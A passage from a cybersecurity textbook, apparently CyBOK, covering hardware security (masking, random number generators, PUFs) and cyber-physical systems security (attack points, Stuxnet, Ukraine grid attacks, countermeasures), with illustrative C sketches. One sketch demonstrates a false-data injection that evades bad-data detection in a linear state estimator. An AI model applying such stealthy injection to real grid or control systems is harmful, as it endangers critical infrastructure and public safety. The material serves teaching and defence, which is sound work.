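       is uniformly random on its own. rand() stands in for a proper TRNG. */
    typedef struct { uint8_t share0, share1; } masked_t;

    masked_t mask(uint8_t secret) {
        masked_t v;
        v.share0 = (uint8_t)rand();      /* fresh random mask */
        v.share1 = secret ^ v.share0;
        return v;
    }

    /* XOR of two masked values, computed without ever unmasking. */
    masked_t masked_xor(masked_t a, masked_t b) {
        masked_t r = { (uint8_t)(a.share0 ^ b.share0),
                       (uint8_t)(a.share1 ^ b.share1) };
        return r;
    }

    uint8_t unmask(masked_t v) { return v.share0 ^ v.share1; }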
Hiding is another major class of countermeasures. The idea is to reduce the signal-to-noise
ratio by reducing the signal strength. Shielding in the context of TEMPEST is one such example.
Similarly, at the gate level, reducing the power or electro-magnetic signature of standard
cells or logic modules will increase the resistance against power or electro-magnetic attacks.
Simple techniques, such as using a jittery or drifting clock and large decoupling capacitances,
will also reduce the signal-to-noise ratio.
Sometimes leakage at one abstraction level, e.g., power side channels, can be
addressed at a different abstraction level. For example, if there is a risk that an encryption key
leaks from an embedded device, a cryptographic protocol that changes the key at a sufficiently
high rate limits the number of observations an attacker can collect for any single key.
True random number generators rely on physical entropy sources, but the bits they generate
might show bias, correlation or other variations. Hence, they do not have full entropy, and are
typically followed by entropy extractors or conditioners. These building blocks improve the
entropy per bit of output. But as entropy extractors are deterministic processes, they cannot
increase the total entropy, so the output length will be shorter than the input length.
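A classic, minimal example of such a conditioner is the von Neumann extractor, sketched below in C under the assumption of independent (but possibly biased) input bits; real designs typically use stronger, standardised conditioners.

    #include <stddef.h>

    /* Von Neumann extractor: raw bits (values 0 or 1) are read in
       non-overlapping pairs; a 01 pair outputs 0, a 10 pair outputs 1,
       and 00/11 pairs are discarded. Assuming independent input bits,
       the output is unbiased, but at most half as long as the input. */
    size_t von_neumann(const unsigned char *raw, size_t n, unsigned char *out) {
        size_t k = 0;
        for (size_t i = 0; i + 1 < n; i += 2) {
            if (raw[i] != raw[i + 1])
                out[k++] = raw[i];   /* 01 -> 0, 10 -> 1 */
        }
        return k;                    /* number of output bits produced */
    }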
Due to environmental conditions, e.g., temperature or voltage variations, the quality
of the generated numbers might vary over time. Therefore, the standards describe specific
tests that should be applied at start-up and continuously during the process of generating
numbers. One can distinguish three main categories of tests. The first is the total failure
test, applied at the source of entropy. The second is the set of online health tests that monitor
the quality of the entropy extractors. The third is the set of tests for the post-processed bits. The
requirements for these tests are well described in the different standards and specialised text
books [1894].
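As an illustration of a total failure test, the following C sketch implements a repetition count test in the spirit of NIST SP 800-90B: it raises an alarm when the source emits the same sample value too many times in a row, which indicates a stuck source. The cutoff value is a parameter that, in a real design, is derived from the claimed entropy per sample.

    #include <stddef.h>

    /* Repetition count test: fail when the same sample value repeats
       'cutoff' times in a row, indicating a stuck entropy source. */
    int repetition_count_test(const unsigned char *s, size_t n,
                              unsigned int cutoff) {
        unsigned int run = 1;
        for (size_t i = 1; i < n; i++) {
            run = (s[i] == s[i - 1]) ? run + 1 : 1;
            if (run >= cutoff)
                return 0;        /* alarm: source looks stuck */
        }
        return 1;                /* test passed */
    }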
The challenge in designing TRNGs is, first, to provide a clear and convincing proof of the
entropy source and, second, to design online tests that are at the same time compact and able
to detect a wide range of defects [1895]. The topic of attacks, countermeasures and sensors
for TRNGs, especially in the context of IoT and embedded devices, is an active research topic.
Physically Unclonable Functions (PUFs) are characterised by the number of challenge-response
pairs they can generate. So-called weak PUFs are circuits with a finite number of elements,
with each element providing a high amount of entropy. The number of possible challenge-
response pairs typically grows linearly with the area of the integrated circuit; hence they are
called weak PUFs. The best-known example is the SRAM PUF [1897]. These PUFs are typically
used for key generation. The raw PUF output is not directly usable for key generation, as the
PUF responses are affected by noise: subsequent readings of the same PUF might result in
slightly varying noisy responses, typically up to 20%. Thus, the raw responses are processed
by a secure sketch (similar to error correction) to eliminate the noise, and the entropy is
compressed to generate a full-entropy key [1898]. The challenge for the PUF designer is to
come up with process variations and circuits that can be used as key material, but which are
not sensitive to transient noise. A second challenge is to keep all the post-processing modules
compact so that the key-generation PUF can be included in embedded IoT devices.
The second class are the so-called strong PUFs. In this case, the number of challenge-response
pairs grows large, ideally exponentially, with the silicon area. The best-known example
is the arbiter PUF [1899]. A small number of silicon elements are combined, e.g., into a chain
of multiplexers or comparators, so that simple combinations of the elements create the large
challenge-response space. Also in this case, the effects of noise in the circuits need to be
taken into account. Strong PUFs promise to be useful in authentication applications, e.g., for
access control. Each time a challenge is applied to the PUF, a response unique to the chip is
sent. The verifier accepts the response if it can be uniquely tied to the prover. This requires
that the PUF responses are registered in a database beforehand, during an enrollment phase.
The problem with strong PUFs is that there is a strong correlation between different challenge-
response pairs of most circuits proposed in the literature. Hence, all of these circuits are broken
with machine learning techniques [1900] and cannot be used for authentication purposes.
The fundamental problem is that very basic, mostly linear operations are used to combine PUF
elements, which makes them easy targets for machine learning attacks. Ideally, these should
be cryptographic or other computationally hard operations resistant to machine learning;
unfortunately, these cannot tolerate noise. Light-weight PUF-based security protocols are an
active area of research.
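The linear structure that machine learning exploits can be seen in the standard additive delay model of an arbiter PUF, sketched below in C: the weights represent per-stage delay differences, and the response is simply the sign of a linear function of a challenge-dependent feature vector. Any model of this form can be fitted by standard classifiers from a modest number of challenge-response pairs. The constants and names are illustrative.

    #include <stdint.h>

    #define STAGES 64

    /* Additive delay model of an arbiter PUF: the response bit is the
       sign of a weighted sum of +/-1 features derived from the challenge.
       Because the model is linear in phi, it is learnable. */
    int arbiter_puf_response(double weights[STAGES + 1],
                             uint8_t challenge[STAGES]) {
        double phi[STAGES + 1];
        phi[STAGES] = 1.0;
        for (int i = STAGES - 1; i >= 0; i--)   /* feature transform */
            phi[i] = phi[i + 1] * (challenge[i] ? -1.0 : 1.0);
        double delay_diff = 0.0;
        for (int i = 0; i <= STAGES; i++)
            delay_diff += weights[i] * phi[i];
        return delay_diff > 0;                   /* response bit */
    }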
20.8.5 Time
The concept of time and the concept of a sequence of events are essential in security protocols.
The TCG identifies three types of sequencing: a monotonic counter, a tick counter and actual
trusted time [1850]. A monotonic counter always increases, but the wall-clock time between
two increments is unknown. The tick counter increases with a set frequency, but only while
the power is on: at power-off the tick counter resets. Therefore, the tick counter is linked
with a nonce, and methods are foreseen to link it to a real wall-clock time. Trusted time is
the most secure: it ensures that there is a link between the tick counter and the real wall-clock
time. From a hardware viewpoint, it requires non-volatile memory, counters, crystals,
continuous power, and an on-chip clock generator. The connection to a real wall clock requires
synchronisation and an actual communication channel.
The importance of time is placed in a wider context in the Distributed Systems Security
Knowledge Area (Chapter 12).
20.9 CONCLUSION
Hardware security is a very broad field, covering many different topics. In this chapter, a
classification is made based on the different design abstraction layers. At each abstraction
layer, the threat model, root of trust and security goals are identified.
Because of the growth of IoT, edge and cloud computing, the importance of hardware security
is growing. Yet, in many cases, hardware security conflicts with other design goals, such as
low-power operation under limited battery budgets. In these circumstances, performance
optimisation is the most important design task; yet it is also the most important cause of
information leakage. This is the case at all abstraction layers: the instruction level, the
architecture level, and the logic and circuit level.
Another trend is that hardware is becoming more ‘soft’. This is an important trend in processor
architecture, where FPGA functionality is added to processor architectures. The fundamental
assumption that hardware is immutable is lost here, and this will create a whole new class of
attacks.
A last big challenge is the lack of EDA tools that support hardware security: EDA tools are
made for performance optimisation, and security is usually an afterthought. An added
challenge is that security is difficult to measure, and thus difficult to trade off against area,
throughput or power optimisations.
INTRODUCTION
Cyber-Physical Systems (CPSs) are engineered systems that are built from, and depend upon,
the seamless integration of computation and physical components. While automatic control
systems like the steam governor have existed for several centuries, it is only in the past
decades that the automation of physical infrastructures like the power grid, water systems,
or chemical reactions has migrated from analogue controls to embedded computer-based
control, often communicating through computer-based networks. In addition, new advances
in implantable medical devices and autonomous self-driving vehicles are increasing the role of
computers in controlling even more physical systems.
While computers give us new opportunities and functionalities for interacting with the physical
world, they can also enable new forms of attacks. The purpose of this Knowledge Area is to
provide an overview of the emerging field of CPS security.
In contrast with other Knowledge Areas within CyBOK that can trace the roots of their field
back several decades, the work on CPS security is relatively new, and our community has
not yet developed the same consensus on best security practices as the cyber security
fields described in other KAs. Therefore, in this document, we focus on providing an overview
of research trends and the unique characteristics of this field.
CPSs are diverse and can include a variety of technologies, for example, industrial control
systems can be characterised by a hierarchy of technology layers (the Purdue model [1905]).
However, the security problems in the higher layers of this taxonomy are more related to
classical security problems covered in other KAs. Therefore, the scope of this document
focuses on the aspects of CPSs more closely related to the sensing, control, and actuation of
these systems (e.g., the lower layers of the Purdue model).
The rest of the Knowledge Area is organised as follows. In Section 21.1 we provide an intro-
duction to CPSs and their unique characteristics. In Section 21.2, we discuss crosscutting
security issues in CPSs generally applicable to several domains (e.g., the power grid or vehicle
systems); in particular we discuss efforts for preventing, detecting, and responding to attacks.
In Section 21.3, we summarise the specific security challenges in a variety of CPS domains,
including the power grid, transportation systems, autonomous vehicles, robotics, and medical
implantable devices. Finally, in Section 21.4, we examine the unique challenges CPS security
poses to regulators and governments. In particular, we outline the role of governments in
incentivising security protections for CPSs, and how CPS security relates to national security
and the conduct of war.
CONTENT
[Figure: a physical system instrumented with sensors (s1–s4) and actuators (a1–a3), connected through a network to distributed controllers (c1–c3).]
Soon after the CPS term was coined, several research communities rallied to outline and
understand how CPS cyber security research is fundamentally different from conventional
IT cyber security. Because of the crosscutting nature of CPSs, the backgrounds of the early
security position papers using the term CPSs, from 2006 to 2009, ranged from real-time
systems [1910, 1911] to embedded systems [1912, 1913], control theory [1909] and
cybersecurity [1908, 1913, 1914, 1915, 1916].
While cyber security research had been previously considered in other physical domains—most
notably in the Supervisory Control and Data Acquisition (SCADA) systems of the power
grid [1917]—these previous efforts focused on applying well-known IT cyber security best
practices to control systems. What differentiated the early CPS security position papers was
their crosscutting nature, focusing on a multi-disciplinary perspective for CPS security (going
beyond classical IT security). For example, while classical intrusion detection systems monitor
purely cyber-events (network packets, operating system information, etc.), early CPSs papers
bringing control theory elements [1908] suggested that intrusion detection systems for CPSs
could also monitor the physical evolution of the system and then check it against a model of
the expected dynamics as a way to improve attack detection.
CPS is related to other popular terms, including the Internet of Things (IoT), Industry 4.0
and the Industrial Internet of Things but, as pointed out by Edward Lee, the term “CPS” is
more foundational and durable than all of these, because it does not directly reference either
implementation approaches (e.g., “Internet” in IoT) or particular applications (e.g., “Industry”
in Industry 4.0). It focuses instead on the fundamental intellectual problem of conjoining the
engineering traditions of the cyber and physical worlds [1906].
The rest of this section is organised as follows: in Section 21.1.1, we introduce general proper-
ties of CPS, then in Section 21.1.2, we discuss how physical systems have been traditionally
protected from accidents and failures, and how these protections are not enough to protect
the system against cyber-attacks. We finalise this section by discussing the security and
privacy risks in CPSs along with summarising some of the most important real-world attacks
on control systems in Section 21.1.3.
One relevant link metric in such networks is the expected number of times a packet has to be
sent before a one-hop transmission is successful. While most of the research on wireless
sensor networks was done in abstract scenarios, one of the first successful real-world
applications of these technologies was in large process control systems, with the advent of
WirelessHART, ISA100, and ZigBee [1922, 1923]. These three communication technologies
were developed on top of the IEEE 802.15.4 standard, whose original version defined frame
sizes so small that they could not carry the header of IPv6 packets.
header of IPv6 packets. Since Internet-connected embedded systems are expected to grow
to billions of devices in the next years, vendors and standard organisations see the need to
create embedded devices compatible with IPv6. To be able to send IPv6 packets in wireless
standards, several efforts tried to tailor IPv6 to embedded networks. Most notably the Internet
Engineering Task Force (IETF) launched the 6LoWPAN effort, originally to define a standard to
send IPv6 packets on top of IEEE 802.15.4 networks, and later to serve as an adaptation layer
for other embedded technologies. Other popular IETF efforts include the RPL routing protocol
for IPv6 sensor networks, and CoAP for application-layer embedded communications [1924].
In the consumer IoT space some popular embedded wireless protocols include Bluetooth,
Bluetooth Low Energy (BLE), ZigBee, and Z-Wave [1925, 1926].
Control: Finally, most CPSs observe and attempt to control variables in the physical world.
Feedback control systems have existed for over two centuries, including technologies like
the steam governor, which was introduced in 1788. Most of the literature in control theory
attempts to model a physical process with differential equations and then design a controller
that satisfies a set of desired properties such as stability and efficiency. Control systems
were initially designed with analogue sensing and analogue control, meaning that the control
logic was implemented in an electrical circuit, including a panel of relays, which usually
encoded ladder logic controls. Analogue systems also allowed the seamless integration of
control signals into a continuous-time physical process. The introduction of digital electronics
and the microprocessor led to work on discrete-time control [1927], as microprocessors
and computers cannot control a system in continuous time because sensing and actuation
signals have to be sampled at discrete-time intervals. More recently, the use of computer
networks has allowed digital controllers to be placed further away from the sensors and
actuators (e.g., pumps, valves, etc.), giving rise to the field of networked control systems [1928].
Another recent attempt to combine the traditional models of physical systems (like differential
equations) and computational models (like finite-state machines) is encapsulated in the field
of hybrid systems [1929]. Hybrid systems played a fundamental role in the motivation towards
creating a CPS research program, as they were an example of how combining models of
computation and models of physical systems can generate new theories that enable us to
reason about the properties of cyber- and physical-controlled systems.
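As a minimal illustration of the discrete-time control described above, the following C sketch simulates a proportional controller sampling a toy tank model at fixed intervals; the plant dynamics, gain and sampling period are illustrative only, and real controllers would add integral/derivative action and safety limits.

    #include <stdio.h>

    /* Toy discrete-time control loop: a tank is filled by a valve (u)
       and drains proportionally to its level; a proportional controller
       runs once per sampling period dt. */
    int main(void) {
        double level = 0.0;           /* sampled tank level (m) */
        const double setpoint = 1.5;  /* desired level (m) */
        const double kp = 0.8;        /* proportional gain */
        const double dt = 1.0;        /* sampling period (s) */
        for (int k = 0; k < 20; k++) {
            double u = kp * (setpoint - level);   /* control law */
            if (u < 0) u = 0;                     /* valve cannot be negative */
            level += dt * (u - 0.2 * level);      /* toy tank dynamics */
            printf("t=%2d level=%.3f\n", k, level);
        }
        return 0;
    }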
Having discussed these general characteristics of CPSs, one caveat is that CPSs are diverse,
and they include modern vehicles, medical devices, and industrial systems, all with differ-
ent standards, requirements, communication technologies, and time constraints. Therefore,
the general characteristics we associate with CPSs might not hold true in all systems or
implementations.
Before we discuss cyber security problems, we describe how physical systems operating
under automatic control systems have been protected from accidents and natural failures, and
how these protections against non-malicious adversaries are not enough against strategic
attackers (i.e., attackers that know that these protections are in place and try to either bypass
them or abuse them).
[Figure 21.2: layers of protection for safety, from process design and basic controls with process alarms and operator supervision, through critical alarms and manual operator intervention, automatic responses (safety interlock or emergency shutdown systems), physical protection (relief devices, dikes), up to plant and community emergency response.]
Safety: The basic principle recommended by the general safety standard for control systems
(IEC 61508) is to obtain requirements from a hazard and risk analysis including the likelihood
of a given failure, and the consequence of the failure, and then design the system so that the
safety requirements are met when all causes of failure are taken into account. This generic
standard has served as the basis for many other standards in specific industries, for example,
the process industry (refineries, chemical systems, etc.) use the IEC 61511 standard to design
a Safety Instrumented System (SIS). The goal of a SIS is to prevent an accident by, e.g., closing
a fuel valve whenever a high-pressure sensor raises an alarm. A more general defence-in-depth
safety analysis uses Layers of Protection [1930], where hazards are mitigated by a set of layers
starting from (1) basic low priority alarms sent to a monitoring station, to (2) the activation of
SIS systems, to (3) mitigation safeguards such as physical protection systems (e.g., dikes) and
(4) organisational response protocols for a plant emergency response/evacuation. Figure 21.2
illustrates these safety layers of protection.
Protection: A related concept to safety is that of protection in electric power grids. These
protection systems include:
• Protection of Generators: when the frequency of the system is too low or too high, the
generator will be automatically disconnected from the power grid to prevent permanent
damage to the generator.
• Under Frequency Load Shedding (UFLS): if the frequency of the power grid is too low,
controlled load shedding will be activated. This disconnection of portions of the electric
distribution system is done in a controlled manner, while avoiding outages in safety-
critical loads like hospitals. UFLS is activated in an effort to increase the frequency of
the power grid, and prevent generators from being disconnected.
• Overcurrent Protection: if the current in a line is too high, a protection relay will be
triggered, opening the line, and preventing damage to equipment on each side of the
lines.
• Over/Under Voltage Protection: if the voltage of a bus is too low or too high, a voltage
relay will be triggered.
Reliability: While safety and protection systems try to prevent accidents, other approaches
try to maintain operations even after failures in the system have occurred. For example, the
electric system is designed and operated to satisfy the so-called N-1 security criterion, which
means that the system could lose any one of its N components (such as one generator,
substation, or transmission line) and continue operating with the resulting transients dying
out to result in a satisfactory new steady-state operating condition, meaning that the reliable
delivery of electric power will continue.
Fault Tolerance: A similar, but data-driven approach to detect and prevent failures falls under
the umbrella of Fault Detection, Isolation, and Reconfiguration (FDIR) [1931]. Anomalies are
detected using either a model-based detection system, or a purely data-driven system; this
part of the process is also known as Bad Data Detection. Isolation is the process of identifying
which device is the source of the anomaly, and reconfiguration is the process of recovering
from the fault, usually by removing the faulty sensor (if there is enough sensor redundancy in
the system).
Robust Control: Finally, another related concept is robust control [1932]. Robust control deals
with the problem of uncertainty in the operation of a control system. These sources of unknown
operating conditions can come from the environment (e.g., gusts of wind in the operation of
planes), sensor noise, dynamics of the system not modelled by the engineers, or degradation
of system components with time. Robust control systems usually take the envelope of least
favourable operating conditions, and then design control algorithms so that the system
operates safely, even in the worst-case uncertainty.
These mechanisms are not sufficient to provide security: before CPS security was a main-
stream field, there was a lot of confusion about whether safety, protection, fault-tolerance and
robust controls were enough to protect CPSs from cyber-attacks. However, as argued over a
decade ago [1909], these protection systems generally assume independent, non-malicious
failures, and in security, incorrect model assumptions are the easiest way for the adversary to
bypass any protection. Since then, there have been several examples that show why these
mechanisms do not provide security. For example, Liu et al. [1933] showed how fault-detection
(bad data detection) algorithms in the power grid can be bypassed by an adversary who sends
incorrect data that is consistent with plausible power grid configurations, yet deviates enough
from the real values to cause problems to the system. A similar example
for dynamic systems (systems with a “time” component) considers stealthy attacks [1934].
These are attacks that inject small amounts of false data into sensors so that the fault-detection
system does not identify them as anomalies but, over a long period of time, can drive the
system to dangerous operating conditions. Similarly, the N-1 security criterion in the electric
power grid assumes that if there is a failure, all protection equipment will react as configured,
but an attacker can change the configuration of protection equipment in the power grid. In
such a case, the outcome of an N-1 failure will be completely unexpected, as equipment will
react in ways that were unanticipated by the operators of the power grid, leading to potential
cascading failures in the bulk power system. Finally, in Section 21.1.3.1, we describe how
real-world attacks are starting to target some of these protections against accidents; for
example, the Triton malware specifically targeted the safety systems of a process control
system.
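The idea behind these false-data injection attacks can be reproduced in a few lines of C, assuming a noise-free linear measurement model z = Hx: an attack vector of the form a = Hc shifts the state estimate by c while leaving the bad-data residual z - Hx_hat unchanged, so the detector is blind to it. All matrix and vector values below are illustrative.

    #include <math.h>
    #include <stdio.h>

    #define M 3                       /* number of measurements */
    #define N 2                       /* number of state variables */

    static void mat_vec(double H[M][N], double *x, double *y) {
        for (int i = 0; i < M; i++) {
            y[i] = 0.0;
            for (int j = 0; j < N; j++) y[i] += H[i][j] * x[j];
        }
    }

    /* Euclidean norm of the bad-data residual z - H*x_hat. */
    static double residual(double *z, double H[M][N], double *x_hat) {
        double hx[M], s = 0.0;
        mat_vec(H, x_hat, hx);
        for (int i = 0; i < M; i++) s += (z[i] - hx[i]) * (z[i] - hx[i]);
        return sqrt(s);
    }

    int main(void) {
        double H[M][N] = {{1, 0}, {0, 1}, {1, 1}};
        double x[N]     = {1.0, 2.0};   /* true state */
        double x_hat[N] = {0.9, 2.1};   /* (slightly off) estimate */
        double c[N]     = {0.5, -0.3};  /* attacker's desired estimate shift */
        double z[M], a[M];
        mat_vec(H, x, z);               /* honest measurements z = Hx */
        mat_vec(H, c, a);               /* structured attack a = Hc */
        printf("residual before attack: %.4f\n", residual(z, H, x_hat));
        for (int i = 0; i < M; i++) z[i] += a[i];       /* inject a */
        for (int j = 0; j < N; j++) x_hat[j] += c[j];   /* estimate shifts by c */
        printf("residual after attack:  %.4f\n", residual(z, H, x_hat));
        return 0;   /* both residuals are identical: the attack is invisible */
    }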
Safety vs. Security: The addition of new security defences may pose safety concerns; for
example, a power plant was shut down because a computer rebooted after a patch [1935].
Software updates and patching might violate safety certifications, and preventing unauthorised
users from accessing a CPS might also prevent first responders from accessing the system
in an emergency (e.g., paramedics might need access to a medical device that prevents
unauthorised connections). Security solutions should take these CPS safety concerns into
account when designing and deploying new security mechanisms.
[Figure 21.3: the general architecture of a CPS: a controller, connected to a supervision/configuration device, receives measurements from sensors and sends commands to actuators acting on a physical process.]
In general, a CPS has a physical process under its control, a set of sensors that report the
state of the process to a controller, which in turn sends control signals to actuators (e.g., a
valve) to maintain the system in a desired state. The controller often communicates with a
supervisory and/or configuration device (e.g., a SCADA system in the power grid, or a medical
device programmer) which can monitor the system or change the settings of the controller.
This general architecture is illustrated in Figure 21.3.
Attacks on CPSs can happen at any point in the general architecture, as illustrated in Figure 21.4,
which considers eight attack points.
[Figure 21.4: the general architecture of a CPS annotated with eight attack points (1–8).]
1. Attack 1 represents an attacker who has compromised a sensor (e.g., if the sensor data
is unauthenticated or if the attacker has the key material for the sensors) and injects
false sensor signals, causing the control logic of the system to act on malicious data.
An example of this type of attack is considered by Huang et al. [1940].
2. Attack 2 represents an attacker in the communication path between the sensor and the
controller, who can delay or even completely block the information from the sensors
to the controller, so the controller loses observability of the system (loss of view), thus
causing it to operate with stale data. Examples of these attacks include denial-of-service
attacks on sensors [1941] and stale data attacks [1942].
3. Attack 3 represents an attacker who has compromised the controller and sends incorrect
control signals to the actuators. An example of this attack is the threat model considered
by McLaughlin [1943].
4. Attack 4 represents an attacker who can delay or block any control command, thus
causing a denial of control to the system. This attack has been considered as a denial-
of-service to the actuators [1941].
5. Attack 5 represents an attacker who can compromise the actuators and execute a
control action that is different from what the controller intended. Notice that this attack is
different from an attack that directly compromises the controller, as it can lead to zero-dynamics
attacks. These types of attacks are considered by Teixeira et al. [1944].
6. Attack 6 represents an attacker who can physically attack the system (e.g., physically
destroying part of the infrastructure and combining this with a cyber-attack). This type
of joint cyber and physical attack has been considered by Amin et al. [1945].
7. Attack 7 represents an attacker who can delay or block communications to and from the
supervisory control system or configuration devices. This attack has been considered in
the context of SCADA systems [1946].
8. Attack 8 represents an attacker who can compromise or impersonate the SCADA system
or the configuration devices, and send malicious control or configuration changes to
the controller. These types of attacks have been illustrated by the attacks on the power
grid in Ukraine where the attackers compromised computers in the control room of the
SCADA system [1947] and attacks where the configuration device of medical devices
has been compromised [1948].
While traditionally most of the considered attacks on CPSs have been software-based, another
property of CPSs is that the integrity of these systems can be compromised even without a
computer-based exploit in what has been referred to as transduction attacks [1949] (these
attacks represent a physical way to inject false signals, as covered by Attack 1 in Figure 21.4).
By targeting the way sensors capture real-world data, the attacker can inject a false sensor
reading or even a false actuation action, by manipulating the physical environment around
the sensor [1949, 1950]. For example, attackers can use speakers to affect the gyroscope of
a drone [1951], exploit unintentional receiving antennas in the wires connecting sensors to
controllers [1952], use intentional electromagnetic interference to cause a servo (an actuator)
to follow the attacker’s commands [1952], or inject inaudible voice commands to digital
assistants [1953].
In addition to security and safety-related problems, CPSs can also have profound privacy
implications unanticipated by designers of new systems. Warren and Brandeis stated in their
seminal 1890 essay The right to privacy [132] that they saw a growing threat from recent inven-
tions, like “instantaneous photographs” that allowed people to be unknowingly photographed,
and new media industries, such as newspapers, that would publish photographs without their
subjects’ consent. The rise of CPS technologies in general, and consumer IoT in particular,
are similarly challenging cultural assumptions about privacy.
CPS devices can collect physical data of diverse human activities such as electricity con-
sumption, location information, driving habits, and biosensor data at unprecedented levels of
granularity. In addition, the passive manner of collection leaves people generally unaware of
how much information about them is being gathered. Furthermore, people are largely unaware
that such collection exposes them to possible surveillance or criminal targeting, as the data
collected by corporations can be obtained by other actors through a variety of legal or illegal
means. For example, automobile manufacturers are remotely collecting a wide variety of
driving history data from cars in an effort to increase the reliability of their products. Data
known to be collected by some manufacturers include speed, odometer information, cabin
temperature, outside temperature, battery status, and range. This paints a very detailed map
of driving habits that can be exploited by manufacturers, retailers, advertisers, auto insurers,
law enforcement, and stalkers, to name just a few.
Having presented the general risks and potential attacks to CPSs we finalise our first section by
describing some of the most important real-world attacks against CPSs launched by malicious
attackers.
Control systems have been at the core of critical infrastructures, manufacturing and industrial
plants for decades, and yet, there have been few confirmed cases of cyber-attacks (here we
focus on attacks from malicious adversaries as opposed to attacks created by researchers
for illustration purposes).
Non-targeted attacks are incidents caused by the same attacks that classical IT computers
may suffer, such as the Slammer worm, which indiscriminately targeted Windows servers
but inadvertently infected the Davis-Besse nuclear power plant [1954], affecting the ability
of engineers to monitor the state of the system. Another non-targeted attack example was a
controller being used to send spam in a water filtering plant [1955].
Targeted attacks are those where adversaries know that they are targeting a CPS, and there-
fore, tailor their attack strategy with the aim of leveraging a specific CPS property. We look in
particular at attacks that had an effect in the physical world, and do not focus on attacks used
to do reconnaissance of CPSs (such as Havex or BlackEnergy [1956]).
The first publicly reported attack on a SCADA system was the 2000 attack on Maroochy
Shire Council’s sewage control system1 in Queensland, Australia [1958], where a contractor
who wanted to be hired for a permanent position maintaining the system used commercially
available radios and stolen SCADA software to make his laptop appear as a pumping station.
During a 3-month period the attacker caused more than 750,000 gallons of untreated sewage
water to be released into parks, rivers, and hotel grounds causing loss of marine life, and
jeopardising public health. The incident cost the city council $176,000 in repairs, monitor-
ing, clean-ups and extra security, and the contractor company spent $500,000 due to the
incident [1959].
In the two decades since the Maroochy Shire attack there have been other confirmed attacks
on CPSs [1960, 1961, 1962, 1963, 1964, 1965, 1966, 1967, 1968]. However, no other attack has
demonstrated the new sophisticated threats that CPSs face like the Stuxnet worm (discovered
in 2010) targeting the nuclear enrichment program in Natanz, Iran [701]. Stuxnet intercepted
requests to read, write, and locate blocks on a Programmable Logic Controller (PLC). By
intercepting these requests, Stuxnet was able to modify the data sent to, and returned from, the
PLC without the knowledge of the PLC operator. The better-known attack variant of Stuxnet
consisted of sending incorrect rotation speeds to the motors powering the centrifuges enriching
uranium, causing the centrifuges to break down and need replacement. As a result, centrifuge
equipment had to be replaced regularly, slowing down the rate at which the Natanz plant was
able to produce enriched uranium.
Two other high-profile confirmed attacks on CPSs were the December 2015 and 2016 attacks
against the Ukrainian power grid [1969, 1970]. These attacks caused power outages and
clearly illustrate the evolution of attack vectors. While the attacks in 2015 leveraged a remote
access program that the attackers had on computers in the SCADA systems of the distribution
power companies, so that a human was involved in sending the malicious commands, the
attacks in 2016 were more automated, thanks to the Industroyer malware [1971], which had
knowledge of the industrial control protocols these machines use to communicate and could
automatically craft malicious packets.
The most recent example in the arms race of malware creation targeting control systems
is the Triton malware [1972] (discovered in 2017 in the Middle East), which targeted safety
systems in industrial control systems and was responsible for at least one process shutting
down. Stuxnet, Industroyer and Triton demonstrate a clear arms race in CPS attacks believed
to be state-sponsored. These attacks will have a profound impact on the way cyber-conflicts
evolve in the future and will play an essential part in how wars may be waged, as we discuss
in the last section of this chapter.
1
There are prior reported attacks on control systems [1957], but there is no public information corroborating
these incidents, and the veracity of some earlier attacks has been questioned.
In resource-constrained CPS devices, the overhead that security mechanisms impose, e.g., in
terms of energy, memory or latency, may not be acceptable [1992]. For symmetric cryptography,
NIST has plans for the standardisation of a portfolio of lightweight cryptographic algorithms
[1993], and the current CAESAR competition for an authenticated-encryption standard is
evaluating the performance of its submissions on resource-constrained devices [1994]. For
public-key algorithms, Elliptic Curve Cryptography generally offers the best balance of
performance and security guarantees, but other lightweight public-key algorithms might be
more appropriate, depending on the requirements of the system [1995]. When it comes to
exploit mitigation, the solutions are less clear. Most deeply embedded devices do not have
support for data execution prevention, address space layout randomisation, stack canaries,
virtual memory, or cryptographically secure random number generators. In addition, system-
on-chip devices have no way to expand their memory, and real-time requirements might pose
limitations on the use of virtual memory. However, there are some efforts to give embedded
operating systems better exploit mitigation tools [1996].
Secure Microkernels: Another OS security approach is to try to formally prove the security
of the kernel. The design of secure operating systems with formal proofs of security is an
effort dating back to the Orange Book [1014]. Because the increasing complexity of code in
monolithic kernels makes it hard to prove that operating systems are free of vulnerabilities,
microkernel architectures that provide a minimal core of the functionality of an operating
system have been on the rise. One example of such a system is the seL4 microkernel, which is
notable because several security properties have been machine-checked with formal proofs of
security [1034]. DARPA’s HACMS program used this microkernel to build a quadcopter with
strong safety and security guarantees [1997].
Preventing Transduction Attacks: As introduced in the previous section, transduction attacks
represent one of the novel ways in which CPS security is different from classical IT security.
Sensors are transducers that translate a physical signal into an electrical one, but these
sensors sometimes have a coupling between the property they want to measure, and another
analogue signal that can be manipulated by the attacker. For example, sound waves can affect
accelerometers in wearable devices and make them report incorrect movement values [1998],
and radio waves can trick pacemakers into disabling pacing shocks [1999]. Security counter-
measures to prevent these attacks include the addition of better filters in sensors, improved
shielding from external signals, anomaly detection, and sensor fusion [1950]. Some specific
proposals include: drilling holes differently in a circuit board to shift the resonant frequency
out of the range of the sensor, adding physical trenches around boards containing speakers
to reduce mechanical coupling, using microfibre cloths for acoustic isolation, implementing
low-pass filters that cut off coupled signals, and using secure amplifiers that prevent signal
clipping [1949, 1998].
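As an illustration of the filtering idea, the following C sketch implements a single-pole low-pass filter of the kind that could suppress a fast, out-of-band coupled signal after digitisation; in practice, such filtering is often done in the analogue front-end, and the filter coefficient here is illustrative.

    /* Single-pole low-pass filter: y[n] = y[n-1] + alpha*(x[n] - y[n-1]).
       A small alpha attenuates fast, out-of-band components such as a
       coupled resonance, while passing the slow legitimate signal. */
    typedef struct { double alpha, state; } lpf_t;

    void lpf_init(lpf_t *f, double alpha) { f->alpha = alpha; f->state = 0.0; }

    double lpf_step(lpf_t *f, double sample) {
        f->state += f->alpha * (sample - f->state);
        return f->state;
    }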
Software-based attestation does not require dedicated security hardware in the device, but it
has weak security guarantees and usually requires the verifier to be within wireless range of
the device being checked. In contrast, hardware-based attestation (e.g., attestation with the
support of a TPM, TrustZone or SGX) provides stronger security, but requires dedicated secure
hardware in CPS devices, which in turn increases their cost, and might not be affordable for
some low-end embedded systems. Hybrid approaches attempt to find a middle ground by
reducing the secure hardware requirements while overcoming the security limitations of pure
software-based approaches [1865, 2004].
The minimal secure hardware requirements include a secure place to store the secret key
and safe code that has exclusive access to that key. A challenge for hybrid attestation is
that it needs to be non-interruptible and atomic (it has to run from beginning to end), and
the (so far) relatively long (5-7 seconds [1865, 2004]) secure measurement of embedded
memory might not be acceptable for safety-critical real-time applications. In addition to
academic work, industry is also developing standards to enhance the security of embedded
